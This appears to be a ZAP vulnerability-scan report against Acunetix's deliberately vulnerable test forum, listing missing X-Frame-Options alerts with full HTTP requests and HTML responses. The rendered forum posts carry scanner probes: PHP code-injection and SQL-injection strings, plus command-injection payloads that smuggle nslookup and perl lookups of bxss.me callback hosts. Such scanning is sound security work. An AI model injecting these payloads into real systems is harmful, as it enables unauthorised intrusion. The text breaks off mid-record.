URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:47 GMT Content-Length: 3098 |
Response Body - size: 3,098 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 12345'"\'\");|]* </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/12345'"\'\");|]* </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>12345'"\'\");|]* - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:49 GMT Content-Length: 4174 |
Response Body - size: 4,174 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:49 GMT Content-Length: 3151 |
Response Body - size: 3,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>|(nslookup hitcsjqyrtmawb4020.bxss.me||perl -e "gethostbyname('hitcsjqyrtmawb4020.bxss.me')")</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:49 GMT Content-Length: 3061 |
Response Body - size: 3,061 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:49 GMT Content-Length: 3071 |
Response Body - size: 3,071 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>//xfs.bxss.me</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:49 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2>(0+5+627-627) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2>(0+5+627-627) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2>(0+5+627-627) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3082 |
Response Body - size: 3,082 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>';print(md5(31337));$a='</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:50 GMT Content-Length: 3152 |
Response Body - size: 3,152 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>`(nslookup hitizikixkvrf2e498.bxss.me||perl -e "gethostbyname('hitizikixkvrf2e498.bxss.me')")`</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" 